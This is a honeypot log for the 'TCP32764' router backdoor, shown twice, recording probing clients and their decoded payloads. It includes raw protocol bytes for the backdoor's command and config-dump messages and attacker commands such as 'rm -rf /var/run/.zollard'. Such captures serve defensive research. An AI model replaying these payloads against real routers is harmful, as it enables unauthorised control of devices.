sja/yhWt.log

## yhWt.log
20 Feb 17:14:19 - Starting Honeypot for router backdoor "TCP32764"...
20 Feb 17:14:19 - Honeypot is running at 32764
20 Feb 17:14:19 - Found 1 pseudo configurations.
20 Feb 17:14:24 - Resolved public ip to 5.147.72.205

24 Feb 19:12:50 - 79.119.143.37:3154 - Connecting...
24 Feb 19:12:50 - 79.119.143.37:3154 - Client joined...
24 Feb 19:12:50 - 79.119.143.37:3154 - Ignore 'blablablabla' request, maybe this is a test by 'poc.py'.
24 Feb 19:12:50 - 79.119.143.37:3154 - Reverse DNS: '79-119-143-37.rdsnet.ro'
79.119.143.37:3154 - ERROR: { [Error: read ECONNRESET] code: 'ECONNRESET', errno: 'ECONNRESET', syscall: 'read' }
24 Feb 19:12:51 - 79.119.143.37:3154 - Connection to client crashed

24 Feb 19:12:51 - 79.119.143.37:3155 - Connecting...
24 Feb 19:12:51 - 79.119.143.37:3155 - Client joined...
24 Feb 19:12:51 - 79.119.143.37:3155 - Payload as bytes: [83,99,77,77,0,0,0,7,0,0,0,25,114,109,32,45,114,102,32,47,118,97,114,47,114,117,110,47,46,122,111,108,108,97,114,100,0]
24 Feb 19:12:51 - 79.119.143.37:3155 - execute/cmd: rm -rf /var/run/.zollard
24 Feb 19:12:51 - 79.119.143.37:3155 - Reverse DNS: '79-119-143-37.rdsnet.ro'
24 Feb 19:12:51 - 79.119.143.37:3155 - Payload as bytes: [83,99,77,77,0,0,0,7,0,0,0,27,109,107,100,105,114,32,45,112,32,47,118,97,114,47,114,117,110,47,46,122,111,108,108,97,11
4,100,0]
24 Feb 19:12:51 - 79.119.143.37:3155 - execute/cmd: mkdir -p /var/run/.zollard
79.119.143.37:3155 - ERROR: { [Error: read ECONNRESET] code: 'ECONNRESET', errno: 'ECONNRESET', syscall: 'read' }
24 Feb 19:12:51 - 79.119.143.37:3155 - Connection to client crashed

26 Feb 23:32:52 - 93.174.90.30:18148 - Connecting...
26 Feb 23:32:52 - 93.174.90.30:18148 - Client joined...
26 Feb 23:32:52 - 93.174.90.30:18148 - Reverse DNS: '2.shulgin.dc1.nl.tor.exit.node.qwertyoruiop.com'
26 Feb 23:32:53 - 93.174.90.30:18148 - Skipping message because invalid header: 2054122604
26 Feb 23:33:22 - 93.174.90.30:18148 - Connection closed after 30.577s, 12 Bytes read and 0 Bytes written
26 Feb 23:33:22 - 93.174.90.30:18148 - Client left

2 Mar 09:31:20 - 37.24.8.25:57537 - Connecting...
2 Mar 09:31:20 - 37.24.8.25:57537 - Client joined...
2 Mar 09:31:20 - 37.24.8.25:57537 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
2 Mar 09:31:20 - 37.24.8.25:57537 - Processing failed: Invalid message
2 Mar 09:31:20 - 37.24.8.25:57537 - Connection closed after 0.042s, 5 Bytes read and 12 Bytes written
2 Mar 09:31:20 - 37.24.8.25:57537 - Client left

2 Mar 10:19:12 - 37.24.8.25:35753 - Connecting...
2 Mar 10:19:12 - 37.24.8.25:35753 - Client joined...
2 Mar 10:19:12 - 37.24.8.25:35753 - Processing failed: Invalid message
2 Mar 10:19:12 - 37.24.8.25:35753 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
2 Mar 10:19:12 - 37.24.8.25:35753 - Connection closed after 0.019s, 5 Bytes read and 12 Bytes written
2 Mar 10:19:12 - 37.24.8.25:35753 - Client left

2 Mar 10:19:12 - 37.24.8.25:34867 - Connecting...
2 Mar 10:19:12 - 37.24.8.25:34867 - Client joined...
2 Mar 10:19:12 - 37.24.8.25:34867 - Payload as bytes: [83,99,77,77,0,0,0,1,0,0,0,0]
2 Mar 10:19:12 - 37.24.8.25:34867 - Sending config...
2 Mar 10:19:12 - 37.24.8.25:34867 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
2 Mar 10:19:12 - 37.24.8.25:34867 - Connection closed after 0.129s, 12 Bytes read and 3670 Bytes written
2 Mar 10:19:12 - 37.24.8.25:34867 - Client left

2 Mar 18:03:28 - 71.6.167.142:34061 - Connecting...
2 Mar 18:03:28 - 71.6.167.142:34061 - Client joined...
2 Mar 18:03:28 - 71.6.167.142:34061 - Reverse DNS: 'census9.shodan.io'
2 Mar 18:03:32 - 71.6.167.142:34061 - Connection closed after 4.187s, 0 Bytes read and 0 Bytes written
2 Mar 18:03:32 - 71.6.167.142:34061 - Client left

3 Mar 23:02:13 - 86.173.188.100:39472 - Connecting...
3 Mar 23:02:13 - 86.173.188.100:39472 - Client joined...
3 Mar 23:02:13 - 86.173.188.100:39472 - Connection closed after 0.023s, 0 Bytes read and 0 Bytes written
3 Mar 23:02:13 - 86.173.188.100:39472 - Client left
3 Mar 23:02:13 - 86.173.188.100:39472 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'

3 Mar 23:13:50 - 86.173.188.100:39699 - Connecting...
3 Mar 23:13:50 - 86.173.188.100:39699 - Client joined...
3 Mar 23:13:50 - 86.173.188.100:39699 - Processing failed: Invalid message
3 Mar 23:13:50 - 86.173.188.100:39699 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'
3 Mar 23:13:50 - 86.173.188.100:39699 - Connection closed after 0.005s, 9 Bytes read and 12 Bytes written
3 Mar 23:13:50 - 86.173.188.100:39699 - Client left

4 Mar 00:03:22 - 86.173.188.100:40402 - Connecting...
4 Mar 00:03:22 - 86.173.188.100:40402 - Client joined...
4 Mar 00:03:22 - 86.173.188.100:40402 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'
4 Mar 00:03:22 - 86.173.188.100:40402 - Processing failed: Invalid message
4 Mar 00:03:22 - 86.173.188.100:40402 - Connection closed after 0.003s, 9 Bytes read and 12 Bytes written
4 Mar 00:03:22 - 86.173.188.100:40402 - Client left
	20 Feb 17:14:19 - Starting Honeypot for router backdoor "TCP32764"...
	20 Feb 17:14:19 - Honeypot is running at 32764
	20 Feb 17:14:19 - Found 1 pseudo configurations.
	20 Feb 17:14:24 - Resolved public ip to 5.147.72.205

	24 Feb 19:12:50 - 79.119.143.37:3154 - Connecting...
	24 Feb 19:12:50 - 79.119.143.37:3154 - Client joined...
	24 Feb 19:12:50 - 79.119.143.37:3154 - Ignore 'blablablabla' request, maybe this is a test by 'poc.py'.
	24 Feb 19:12:50 - 79.119.143.37:3154 - Reverse DNS: '79-119-143-37.rdsnet.ro'
	79.119.143.37:3154 - ERROR: { [Error: read ECONNRESET] code: 'ECONNRESET', errno: 'ECONNRESET', syscall: 'read' }
	24 Feb 19:12:51 - 79.119.143.37:3154 - Connection to client crashed

	24 Feb 19:12:51 - 79.119.143.37:3155 - Connecting...
	24 Feb 19:12:51 - 79.119.143.37:3155 - Client joined...
	24 Feb 19:12:51 - 79.119.143.37:3155 - Payload as bytes: [83,99,77,77,0,0,0,7,0,0,0,25,114,109,32,45,114,102,32,47,118,97,114,47,114,117,110,47,46,122,111,108,108,97,114,100,0]
	24 Feb 19:12:51 - 79.119.143.37:3155 - execute/cmd: rm -rf /var/run/.zollard
	24 Feb 19:12:51 - 79.119.143.37:3155 - Reverse DNS: '79-119-143-37.rdsnet.ro'
	24 Feb 19:12:51 - 79.119.143.37:3155 - Payload as bytes: [83,99,77,77,0,0,0,7,0,0,0,27,109,107,100,105,114,32,45,112,32,47,118,97,114,47,114,117,110,47,46,122,111,108,108,97,11
	4,100,0]
	24 Feb 19:12:51 - 79.119.143.37:3155 - execute/cmd: mkdir -p /var/run/.zollard
	79.119.143.37:3155 - ERROR: { [Error: read ECONNRESET] code: 'ECONNRESET', errno: 'ECONNRESET', syscall: 'read' }
	24 Feb 19:12:51 - 79.119.143.37:3155 - Connection to client crashed

	26 Feb 23:32:52 - 93.174.90.30:18148 - Connecting...
	26 Feb 23:32:52 - 93.174.90.30:18148 - Client joined...
	26 Feb 23:32:52 - 93.174.90.30:18148 - Reverse DNS: '2.shulgin.dc1.nl.tor.exit.node.qwertyoruiop.com'
	26 Feb 23:32:53 - 93.174.90.30:18148 - Skipping message because invalid header: 2054122604
	26 Feb 23:33:22 - 93.174.90.30:18148 - Connection closed after 30.577s, 12 Bytes read and 0 Bytes written
	26 Feb 23:33:22 - 93.174.90.30:18148 - Client left

	2 Mar 09:31:20 - 37.24.8.25:57537 - Connecting...
	2 Mar 09:31:20 - 37.24.8.25:57537 - Client joined...
	2 Mar 09:31:20 - 37.24.8.25:57537 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
	2 Mar 09:31:20 - 37.24.8.25:57537 - Processing failed: Invalid message
	2 Mar 09:31:20 - 37.24.8.25:57537 - Connection closed after 0.042s, 5 Bytes read and 12 Bytes written
	2 Mar 09:31:20 - 37.24.8.25:57537 - Client left

	2 Mar 10:19:12 - 37.24.8.25:35753 - Connecting...
	2 Mar 10:19:12 - 37.24.8.25:35753 - Client joined...
	2 Mar 10:19:12 - 37.24.8.25:35753 - Processing failed: Invalid message
	2 Mar 10:19:12 - 37.24.8.25:35753 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
	2 Mar 10:19:12 - 37.24.8.25:35753 - Connection closed after 0.019s, 5 Bytes read and 12 Bytes written
	2 Mar 10:19:12 - 37.24.8.25:35753 - Client left

	2 Mar 10:19:12 - 37.24.8.25:34867 - Connecting...
	2 Mar 10:19:12 - 37.24.8.25:34867 - Client joined...
	2 Mar 10:19:12 - 37.24.8.25:34867 - Payload as bytes: [83,99,77,77,0,0,0,1,0,0,0,0]
	2 Mar 10:19:12 - 37.24.8.25:34867 - Sending config...
	2 Mar 10:19:12 - 37.24.8.25:34867 - Reverse DNS: 'ip-37-24-8-25.unitymediagroup.de'
	2 Mar 10:19:12 - 37.24.8.25:34867 - Connection closed after 0.129s, 12 Bytes read and 3670 Bytes written
	2 Mar 10:19:12 - 37.24.8.25:34867 - Client left

	2 Mar 18:03:28 - 71.6.167.142:34061 - Connecting...
	2 Mar 18:03:28 - 71.6.167.142:34061 - Client joined...
	2 Mar 18:03:28 - 71.6.167.142:34061 - Reverse DNS: 'census9.shodan.io'
	2 Mar 18:03:32 - 71.6.167.142:34061 - Connection closed after 4.187s, 0 Bytes read and 0 Bytes written
	2 Mar 18:03:32 - 71.6.167.142:34061 - Client left

	3 Mar 23:02:13 - 86.173.188.100:39472 - Connecting...
	3 Mar 23:02:13 - 86.173.188.100:39472 - Client joined...
	3 Mar 23:02:13 - 86.173.188.100:39472 - Connection closed after 0.023s, 0 Bytes read and 0 Bytes written
	3 Mar 23:02:13 - 86.173.188.100:39472 - Client left
	3 Mar 23:02:13 - 86.173.188.100:39472 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'

	3 Mar 23:13:50 - 86.173.188.100:39699 - Connecting...
	3 Mar 23:13:50 - 86.173.188.100:39699 - Client joined...
	3 Mar 23:13:50 - 86.173.188.100:39699 - Processing failed: Invalid message
	3 Mar 23:13:50 - 86.173.188.100:39699 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'
	3 Mar 23:13:50 - 86.173.188.100:39699 - Connection closed after 0.005s, 9 Bytes read and 12 Bytes written
	3 Mar 23:13:50 - 86.173.188.100:39699 - Client left

	4 Mar 00:03:22 - 86.173.188.100:40402 - Connecting...
	4 Mar 00:03:22 - 86.173.188.100:40402 - Client joined...
	4 Mar 00:03:22 - 86.173.188.100:40402 - Reverse DNS: 'host86-173-188-100.range86-173.btcentralplus.com'
	4 Mar 00:03:22 - 86.173.188.100:40402 - Processing failed: Invalid message
	4 Mar 00:03:22 - 86.173.188.100:40402 - Connection closed after 0.003s, 9 Bytes read and 12 Bytes written
	4 Mar 00:03:22 - 86.173.188.100:40402 - Client left